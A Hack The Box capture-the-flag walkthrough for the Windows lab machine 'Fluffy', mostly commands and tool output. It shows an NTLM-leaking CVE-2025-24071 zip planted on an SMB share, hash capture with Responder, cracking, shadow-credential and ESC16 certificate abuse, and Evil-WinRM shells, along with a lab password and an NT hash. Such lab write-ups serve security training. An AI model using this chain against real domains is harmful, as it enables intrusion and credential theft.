Fluffy

# Fluffy - Windows - Easy ## Port Scanning ```shell rustscan -a 10.10.11.69 -- -sV .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- Scanning ports like it's my full-time job. Wait, it is. [~] The config file is expected to be at "/home/oscarmine/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. Open 10.10.11.69:53 Open 10.10.11.69:88 Open 10.10.11.69:139 Open 10.10.11.69:389 Open 10.10.11.69:445 Open 10.10.11.69:464 Open 10.10.11.69:593 Open 10.10.11.69:636 Open 10.10.11.69:3269 Open 10.10.11.69:3268 Open 10.10.11.69:5985 Open 10.10.11.69:9389 Open 10.10.11.69:49667 Open 10.10.11.69:49729 Open 10.10.11.69:49712 Open 10.10.11.69:49693 Open 10.10.11.69:49690 Open 10.10.11.69:49689 Open 10.10.11.69:49764 [~] Starting Script(s) [>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sV" on ip 10.10.11.69 Depending on the complexity of the script, results may take some time to appear. [~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-21 18:15 +05 NSE: Loaded 47 scripts for scanning. Initiating Ping Scan at 18:15 Scanning 10.10.11.69 [4 ports] Completed Ping Scan at 18:15, 0.14s elapsed (1 total hosts) Initiating SYN Stealth Scan at 18:15 Scanning fluffy.htb (10.10.11.69) [19 ports] Discovered open port 445/tcp on 10.10.11.69 Discovered open port 53/tcp on 10.10.11.69 Discovered open port 49693/tcp on 10.10.11.69 Discovered open port 139/tcp on 10.10.11.69 Discovered open port 49667/tcp on 10.10.11.69 Discovered open port 49764/tcp on 10.10.11.69 Discovered open port 636/tcp on 10.10.11.69 Discovered open port 9389/tcp on 10.10.11.69 Discovered open port 3269/tcp on 10.10.11.69 Discovered open port 389/tcp on 10.10.11.69 Discovered open port 49712/tcp on 10.10.11.69 Discovered open port 3268/tcp on 10.10.11.69 Discovered open port 88/tcp on 10.10.11.69 Discovered open port 5985/tcp on 10.10.11.69 Discovered open port 49729/tcp on 10.10.11.69 Discovered open port 464/tcp on 10.10.11.69 Discovered open port 49689/tcp on 10.10.11.69 Discovered open port 593/tcp on 10.10.11.69 Discovered open port 49690/tcp on 10.10.11.69 Completed SYN Stealth Scan at 18:15, 0.24s elapsed (19 total ports) Initiating Service scan at 18:15 Scanning 19 services on fluffy.htb (10.10.11.69) Completed Service scan at 18:16, 56.35s elapsed (19 services on 1 host) NSE: Script scanning 10.10.11.69. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 18:16 Completed NSE at 18:16, 0.51s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 18:16 Completed NSE at 18:16, 0.41s elapsed Nmap scan report for fluffy.htb (10.10.11.69) Host is up, received echo-reply ttl 127 (0.11s latency). Scanned at 2025-07-21 18:15:40 +05 for 58s PORT STATE SERVICE REASON VERSION 53/tcp open domain syn-ack ttl 127 Simple DNS Plus 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-07-21 20:15:47Z) 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? syn-ack ttl 127 464/tcp open kpasswd5? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name) 3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name) 3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name) 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing 49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49689/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 49690/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49693/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49712/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49729/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49764/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Read data files from: /usr/share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 57.97 seconds Raw packets sent: 23 (988B) | Rcvd: 20 (864B) ``` ## Smb Enumeration ```shell smbmap -H fluffy.htb -u 'j.fleischman' -p 'J0elTHEM4n1990!' ________ ___ ___ _______ ___ ___ __ _______ /" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\ (: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :) \___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/ __/ \ |: \. |(| _ \ |: \. | // __' \ (| / /" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \ (_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______) ----------------------------------------------------------------------------- SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com https://github.com/ShawnDEvans/smbmap [*] Detected 1 hosts serving SMB [*] Established 1 SMB connections(s) and 1 authenticated session(s) [+] IP: 10.10.11.69:445 Name: fluffy.htb Status: Authenticated Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ READ ONLY Remote IPC IT READ, WRITE NETLOGON READ ONLY Logon server share SYSVOL READ ONLY Logon server share [*] Closed 1 connections ``` ## Smbclient IT share access ```shell smbclient //fluffy.htb/IT -U j.fleischman%J0elTHEM4n1990! Try "help" to get a list of possible commands. smb: \> ls . D 0 Tue Jul 22 01:21:11 2025 .. D 0 Tue Jul 22 01:21:11 2025 .DS_Store AH 8196 Tue Jul 22 01:21:20 2025 Everything-1.4.1.1026.x64 D 0 Fri Apr 18 20:08:44 2025 Everything-1.4.1.1026.x64 2 D 0 Tue Jul 22 01:21:10 2025 Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 20:04:05 2025 KeePass-2.58 D 0 Fri Apr 18 20:08:38 2025 KeePass-2.58.zip A 3225346 Fri Apr 18 20:03:17 2025 Upgrade_Notice.pdf A 169963 Sat May 17 19:31:07 2025 5842943 blocks of size 4096. 2244939 blocks available smb: \> ``` ### Download Upgrade_Notice.pdf then read and you can see that there is a cve name CVE-2025-24071 ## Let's use this exploit ### CVE: CVE-2025-24071 ### Url: https://github.com/0x6rss/CVE-2025-24071_PoC ```shell ┌──(oscarmine㉿FuckingKali)-[~/…/htb/machines/fluffy/CVE-2025-24071_PoC] └─$ ls README.md poc.py ┌──(oscarmine㉿FuckingKali)-[~/…/htb/machines/fluffy/CVE-2025-24071_PoC] └─$ python3 poc.py Enter your file name: exploit Enter IP (EX: 192.168.1.162): 10.10.14.35 completed ┌──(oscarmine㉿FuckingKali)-[~/…/htb/machines/fluffy/CVE-2025-24071_PoC] └─$ ls README.md exploit.zip poc.py ``` ## Uploading our exploit ```shell ┌──(oscarmine㉿FuckingKali)-[~/…/htb/machines/fluffy/CVE-2025-24071_PoC] └─$ smbclient //fluffy.htb/IT -U j.fleischman%J0elTHEM4n1990! Try "help" to get a list of possible commands. smb: \> put exploit.zip putting file exploit.zip as \exploit.zip (0.9 kb/s) (average 0.9 kb/s) smb: \> ls . D 0 Tue Jul 22 01:46:10 2025 .. D 0 Tue Jul 22 01:46:10 2025 .DS_Store AH 8196 Tue Jul 22 01:21:20 2025 Everything-1.4.1.1026.x64 D 0 Fri Apr 18 20:08:44 2025 Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 20:04:05 2025 exploit.zip A 323 Tue Jul 22 01:46:10 2025 KeePass-2.58 D 0 Fri Apr 18 20:08:38 2025 KeePass-2.58.zip A 3225346 Fri Apr 18 20:03:17 2025 Upgrade_Notice.pdf A 169963 Sat May 17 19:31:07 2025 5842943 blocks of size 4096. 2245330 blocks available smb: \> ``` ## Use Responder to receive victim's hash, if you not receiving hash after putting exploit.zip try putting it again to smb share ```shell ──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy] └─$ sudo responder -I tun0 -wvF __ .----.-----.-----.-----.-----.-----.--| |.-----.----. | _| -__|__ --| _ | _ | | _ || -__| _| |__| |_____|_____| __|_____|__|__|_____||_____|__| |__| NBT-NS, LLMNR & MDNS Responder 3.1.6.0 To support this project: Github -> https://github.com/sponsors/lgandx Paypal -> https://paypal.me/PythonResponder Author: Laurent Gaffie (laurent.gaffie@gmail.com) To kill this script hit CTRL-C [+] Poisoners: LLMNR [ON] NBT-NS [ON] MDNS [ON] DNS [ON] DHCP [OFF] [+] Servers: HTTP server [ON] HTTPS server [ON] WPAD proxy [ON] Auth proxy [OFF] SMB server [ON] Kerberos server [ON] SQL server [ON] FTP server [ON] IMAP server [ON] POP3 server [ON] SMTP server [ON] DNS server [ON] LDAP server [ON] MQTT server [ON] RDP server [ON] DCE-RPC server [ON] WinRM server [ON] SNMP server [ON] [+] HTTP Options: Always serving EXE [OFF] Serving EXE [OFF] Serving HTML [OFF] Upstream Proxy [OFF] [+] Poisoning Options: Analyze Mode [OFF] Force WPAD auth [ON] Force Basic Auth [OFF] Force LM downgrade [OFF] Force ESS downgrade [OFF] [+] Generic Options: Responder NIC [tun0] Responder IP [10.10.14.35] Responder IPv6 [dead:beef:2::1021] Challenge set [random] Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL'] Don't Respond To MDNS TLD ['_DOSVC'] TTL for poisoned response [default] [+] Current Session Variables: Responder Machine Name [WIN-00ZT3QNQWRK] Responder Domain Name [1DEF.LOCAL] Responder DCE-RPC Port [49536] [+] Listening for events... [SMB] NTLMv2-SSP Client : 10.10.11.69 [SMB] NTLMv2-SSP Username : FLUFFY\p.agila [SMB] NTLMv2-SSP Hash : <REDACTED HASH> ``` ## Cracking the hash ```shell ──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy] └─$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Will run 6 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status <REDACTED PASSWORD> (p.agila) 1g 0:00:00:02 DONE (2025-07-21 19:00) 0.4366g/s 1972Kp/s 1972Kc/s 1972KC/s proquis..prom pics Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably Session completed. ``` ## bloodhound-python ```shell ┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy] └─$ bloodhound-python -u 'p.agila' -p '<REDACTED PASSWORD>' -d fluffy.htb -ns 10.10.11.69 -c all --zip INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3) INFO: Found AD domain: fluffy.htb INFO: Getting TGT for user WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.fluffy.htb:88)] [Errno -2] Name or service not known INFO: Connecting to LDAP server: dc01.fluffy.htb INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: dc01.fluffy.htb INFO: Found 10 users INFO: Found 54 groups INFO: Found 2 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: DC01.fluffy.htb INFO: Done in 00M 24S INFO: Compressing output into 20250721190416_bloodhound.zip ``` ## Add p.agila to group ```shell ┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy] └─$ bloodyAD --host '10.10.11.69' -d 'dc01.fluffy.htb' -u 'p.agila' -p '<REDACTED PASSWORD>' add groupMember 'SERVICE ACCOUNTS' p.agila [+] p.agila added to SERVICE ACCOUNTS ``` ## Service accounts (like ca_svc, ldap_svc, winrm_svc) have GenericWrite rights, which means shadow certificates (KeyCredentials) can be added to them ```shell ┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy] └─$ certipy-ad shadow auto -u 'p.agila@fluffy.htb' -p '<REDACTED PASSWORD>' -account 'WINRM_SVC' -dc-ip '10.10.11.69' Certipy v5.0.2 - by Oliver Lyak (ly4k) [*] Targeting user 'winrm_svc' [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID '1c6a51e2-3710-dfe6-ca6e-6aece7bc0ed9' [*] Adding Key Credential with device ID '1c6a51e2-3710-dfe6-ca6e-6aece7bc0ed9' to the Key Credentials for 'winrm_svc' [*] Successfully added Key Credential with device ID '1c6a51e2-3710-dfe6-ca6e-6aece7bc0ed9' to the Key Credentials for 'winrm_svc' [*] Authenticating as 'winrm_svc' with the certificate [*] Certificate identities: [*] No identities found in this certificate [*] Using principal: 'winrm_svc@fluffy.htb' [*] Trying to get TGT... [-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) [-] Use -debug to print a stacktrace [-] See the wiki for more information [*] Restoring the old Key Credentials for 'winrm_svc' [*] Successfully restored the old Key Credentials for 'winrm_svc' [*] NT hash for 'winrm_svc': None ``` ### but we got error with clock, we have to copy clock time from target to be same time with target ```shell ┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy] └─$ sudo ntpdate 10.10.11.69 2025-07-22 03:02:44.972501 (+0500) +25200.237054 +/- 0.059889 10.10.11.69 s1 no-leap CLOCK: time stepped by 25200.237054 ``` ### now try again ```shell ┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy] └─$ certipy-ad shadow auto -u 'p.agila@fluffy.htb' -p '<REDACTED PASSWORD>' -account 'WINRM_SVC' -dc-ip '10.10.11.69' Certipy v5.0.2 - by Oliver Lyak (ly4k) [!] DNS resolution failed: The resolution lifetime expired after 5.409 seconds: Server Do53:10.10.11.69@53 answered The DNS operation timed out.; Server Do53:10.10.11.69@53 answered The DNS operation timed out.; Server Do53:10.10.11.69@53 answered The DNS operation timed out. [!] Use -debug to print a stacktrace [*] Targeting user 'winrm_svc' [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID 'f4ec37c0-c6ed-3c1f-408b-19279eb50f5f' [*] Adding Key Credential with device ID 'f4ec37c0-c6ed-3c1f-408b-19279eb50f5f' to the Key Credentials for 'winrm_svc' [*] Successfully added Key Credential with device ID 'f4ec37c0-c6ed-3c1f-408b-19279eb50f5f' to the Key Credentials for 'winrm_svc' [*] Authenticating as 'winrm_svc' with the certificate [*] Certificate identities: [*] No identities found in this certificate [*] Using principal: 'winrm_svc@fluffy.htb' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'winrm_svc.ccache' [*] Wrote credential cache to 'winrm_svc.ccache' [*] Trying to retrieve NT hash for 'winrm_svc' [*] Restoring the old Key Credentials for 'winrm_svc' [*] Successfully restored the old Key Credentials for 'winrm_svc' [*] NT hash for 'winrm_svc': <REDACTED WINRM_SVC HASH> ``` ## Connect with Evil-WinRM ```shell ──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy] └─$ evil-winrm -i 10.10.11.69 -u WINRM_SVC -H <REDACTED WINRM_SVC HASH> Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\winrm_svc\Documents> ``` ## Get the user.txt ```shell *Evil-WinRM* PS C:\Users\winrm_svc\Desktop> dir Directory: C:\Users\winrm_svc\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 7/21/2025 4:02 AM 34 user.txt *Evil-WinRM* PS C:\Users\winrm_svc\Desktop> type user.txt ``` ## There doesn't seem to be anything special about the WINRM_SVC user ```shell ┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy] └─$ certipy-ad find -vulnerable -u CA_SVC -hashes ":ca0f4f9e9eb8a092addf53bb03fc98c8" -dc-ip 10.10.11.69 Certipy v5.0.2 - by Oliver Lyak (ly4k) [*] Finding certificate templates [*] Found 33 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 11 enabled certificate templates [*] Finding issuance policies [*] Found 14 issuance policies [*] Found 0 OIDs linked to templates [*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP [!] Failed to connect to remote registry. Service should be starting now. Trying again... [*] Successfully retrieved CA configuration for 'fluffy-DC01-CA' [*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb' [!] Error checking web enrollment: timed out [!] Use -debug to print a stacktrace [!] Error checking web enrollment: timed out [!] Use -debug to print a stacktrace [*] Saving text output to '20250721203445_Certipy.txt' [*] Wrote text output to '20250721203445_Certipy.txt' [*] Saving JSON output to '20250721203445_Certipy.json' [*] Wrote JSON output to '20250721203445_Certipy.json' ``` ## No templates were found ```shell ┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy] └─$ cat 20250721203445_Certipy.txt Certificate Authorities 0 CA Name : fluffy-DC01-CA DNS Name : DC01.fluffy.htb Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5 Certificate Validity Start : 2025-04-17 16:00:16+00:00 Certificate Validity End : 3024-04-17 16:11:16+00:00 Web Enrollment : Disabled User Specified SAN : Disabled Request Disposition : Issue Enforce Encryption for Requests : Enabled Permissions Owner : FLUFFY.HTB\Administrators Access Rights ManageCertificates : FLUFFY.HTB\Domain Admins FLUFFY.HTB\Enterprise Admins FLUFFY.HTB\Administrators ManageCa : FLUFFY.HTB\Domain Admins FLUFFY.HTB\Enterprise Admins FLUFFY.HTB\Administrators Enroll : FLUFFY.HTB\Cert Publishers Certificate Templates : [!] Could not find any certificate templates ``` ## Maybe it's because the version of certipy-ad is too low, update it ```shell ┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy] └─$ pip3 install --upgrade certipy-ad --break-system-packages Defaulting to user installation because normal site-packages is not writeable Requirement already satisfied: certipy-ad in /usr/lib/python3/dist-packages (5.0.2) Collecting certipy-ad Downloading certipy_ad-5.0.3-py3-none-any.whl.metadata (4.7 kB) <SNIP> Successfully installed certipy-ad-5.0.3 cryptography-42.0.8 impacket-0.12.0 pycryptodome-3.22.0 pyopenssl-24.0.0 ``` ## Try Again ```shell ──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy] └─$ certipy find -username ca_svc -hashes :ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.10.11.69 -vulnerable Certipy v5.0.3 - by Oliver Lyak (ly4k) [*] Finding certificate templates [*] Found 33 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 11 enabled certificate templates [*] Finding issuance policies [*] Found 14 issuance policies [*] Found 0 OIDs linked to templates [*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP [*] Successfully retrieved CA configuration for 'fluffy-DC01-CA' [*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb' [!] Error checking web enrollment: timed out [!] Use -debug to print a stacktrace [!] Error checking web enrollment: timed out [!] Use -debug to print a stacktrace [*] Saving text output to '20250721204434_Certipy.txt' [*] Wrote text output to '20250721204434_Certipy.txt' [*] Saving JSON output to '20250721204434_Certipy.json' [*] Wrote JSON output to '20250721204434_Certipy.json' ┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy] └─$ cat 20250721204434_Certipy.txt Certificate Authorities 0 CA Name : fluffy-DC01-CA DNS Name : DC01.fluffy.htb Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5 Certificate Validity Start : 2025-04-17 16:00:16+00:00 Certificate Validity End : 3024-04-17 16:11:16+00:00 Web Enrollment HTTP Enabled : False HTTPS Enabled : False User Specified SAN : Disabled Request Disposition : Issue Enforce Encryption for Requests : Enabled Active Policy : CertificateAuthority_MicrosoftDefault.Policy Disabled Extensions : 1.3.6.1.4.1.311.25.2 Permissions Owner : FLUFFY.HTB\Administrators Access Rights ManageCa : FLUFFY.HTB\Domain Admins FLUFFY.HTB\Enterprise Admins FLUFFY.HTB\Administrators ManageCertificates : FLUFFY.HTB\Domain Admins FLUFFY.HTB\Enterprise Admins FLUFFY.HTB\Administrators Enroll : FLUFFY.HTB\Cert Publishers [!] Vulnerabilities ESC16 : Security Extension is disabled. [*] Remarks ESC16 : Other prerequisites may be required for this to be exploitable. See the wiki for more details. Certificate Templates : [!] Could not find any certificate templates ``` There is an ESC16 vulnerability! , refer to the following link: https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc16-security-extension-disabled-on-ca-globally ## Step 1: Read the original UPN of the victim account (optional - for recovery) ```shell ┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy] └─$ certipy account -u 'p.agila@fluffy.htb' -p '<REDACTED PASSWORD>' -dc-ip '10.10.11.69' -user 'ca_svc' read Certipy v5.0.3 - by Oliver Lyak (ly4k) [*] Reading attributes for 'ca_svc': cn : certificate authority service distinguishedName : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb name : certificate authority service objectSid : S-1-5-21-497550768-2797716248-2627064577-1103 sAMAccountName : ca_svc servicePrincipalName : ADCS/ca.fluffy.htb userPrincipalName : Administrator userAccountControl : 66048 whenCreated : 2025-04-17T16:07:50+00:00 whenChanged : 2025-07-21T22:43:46+00:00 ``` ## Step 2: Update the victim account’s UPN to the target admin’s sAMAccountName ```shell ┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy] └─$ certipy account -u 'p.agila@fluffy.htb' -p '<REDACTED PASSWORD>' -dc-ip '10.10.11.69' -upn 'administrator' -user 'ca_svc' update Certipy v5.0.3 - by Oliver Lyak (ly4k) [*] Updating user 'ca_svc': userPrincipalName : administrator [*] Successfully updated 'ca_svc' ``` ## Step 3: Request a certificate issued as the "victim" user from any suitable client authentication template* (e.g., "user") on the CA vulnerable to ESC16 ```shell ──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy] └─$ sudo ntpdate 10.10.11.69 2025-07-22 03:54:42.250487 (+0500) +25200.677259 +/- 0.047417 10.10.11.69 s1 no-leap CLOCK: time stepped by 25200.677259 ┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy] └─$ certipy shadow -u 'p.agila@fluffy.htb' -p '<REDACTED PASSWORD>' -dc-ip '10.10.11.69' -account 'ca_svc' auto Certipy v5.0.3 - by Oliver Lyak (ly4k) [!] DNS resolution failed: The resolution lifetime expired after 5.405 seconds: Server Do53:10.10.11.69@53 answered The DNS operation timed out.; Server Do53:10.10.11.69@53 answered The DNS operation timed out.; Server Do53:10.10.11.69@53 answered The DNS operation timed out. [!] Use -debug to print a stacktrace [*] Targeting user 'ca_svc' [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID 'b5a02676ce1f4e7db116717183200296' [*] Adding Key Credential with device ID 'b5a02676ce1f4e7db116717183200296' to the Key Credentials for 'ca_svc' [*] Successfully added Key Credential with device ID 'b5a02676ce1f4e7db116717183200296' to the Key Credentials for 'ca_svc' [*] Authenticating as 'ca_svc' with the certificate [*] Certificate identities: [*] No identities found in this certificate [*] Using principal: 'ca_svc@fluffy.htb' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'ca_svc.ccache' [*] Wrote credential cache to 'ca_svc.ccache' [*] Trying to retrieve NT hash for 'ca_svc' [*] Restoring the old Key Credentials for 'ca_svc' [*] Successfully restored the old Key Credentials for 'ca_svc' [*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8 ┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy] └─$ export KRB5CCNAME=ca_svc.ccache ``` ## Then request a certificate ```shell ┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy] └─$ sudo ntpdate 10.10.11.69 2025-07-22 03:59:16.331563 (+0500) +25200.676839 +/- 0.047240 10.10.11.69 s1 no-leap CLOCK: time stepped by 25200.676839 ┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy] └─$ certipy req -k -dc-ip 10.10.11.69 -dc-host dc01.fluffy.htb -target DC01.FLUFFY.HTB -ca fluffy-DC01-CA -template User Certipy v5.0.3 - by Oliver Lyak (ly4k) [*] Requesting certificate via RPC [*] Request ID is 20 [*] Successfully requested certificate [*] Got certificate with UPN 'administrator' [*] Certificate has no object SID [*] Try using -sid to set the object SID or see the wiki for more details [*] Saving certificate and private key to 'administrator.pfx' [*] Wrote certificate and private key to 'administrator.pfx' ``` ## Step 4: Restore the UPN of the "victim" account ```shell ┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy] └─$ certipy account -u 'p.agila@fluffy.htb' -p '<REDACTED PASSWORD>' -dc-ip '10.10.11.69' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update Certipy v5.0.3 - by Oliver Lyak (ly4k) [*] Updating user 'ca_svc': userPrincipalName : ca_svc@fluffy.htb [*] Successfully updated 'ca_svc' ``` ## Step 5: Authenticate as the target administrator ```shell ┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy] └─$ sudo ntpdate 10.10.11.69 2025-07-22 04:02:04.191146 (+0500) +25200.670874 +/- 0.050795 10.10.11.69 s1 no-leap CLOCK: time stepped by 25200.670874 ┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy] └─$ certipy auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb' Certipy v5.0.3 - by Oliver Lyak (ly4k) [*] Certificate identities: [*] SAN UPN: 'administrator' [*] Using principal: 'administrator@fluffy.htb' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'administrator.ccache' [*] Wrote credential cache to 'administrator.ccache' [*] Trying to retrieve NT hash for 'administrator' [*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:<REDACTED ADMINISTRATOR HASH> ``` ## Authenticate as administrator and get root.txt ```shell ──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy] └─$ evil-winrm -i 10.10.11.69 -u 'administrator' -H '<REDACTED ADMINISTRATOR HASH>' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt <REDACTED ROOT.TXT CONTENT> *Evil-WinRM* PS C:\Users\Administrator\Documents> ```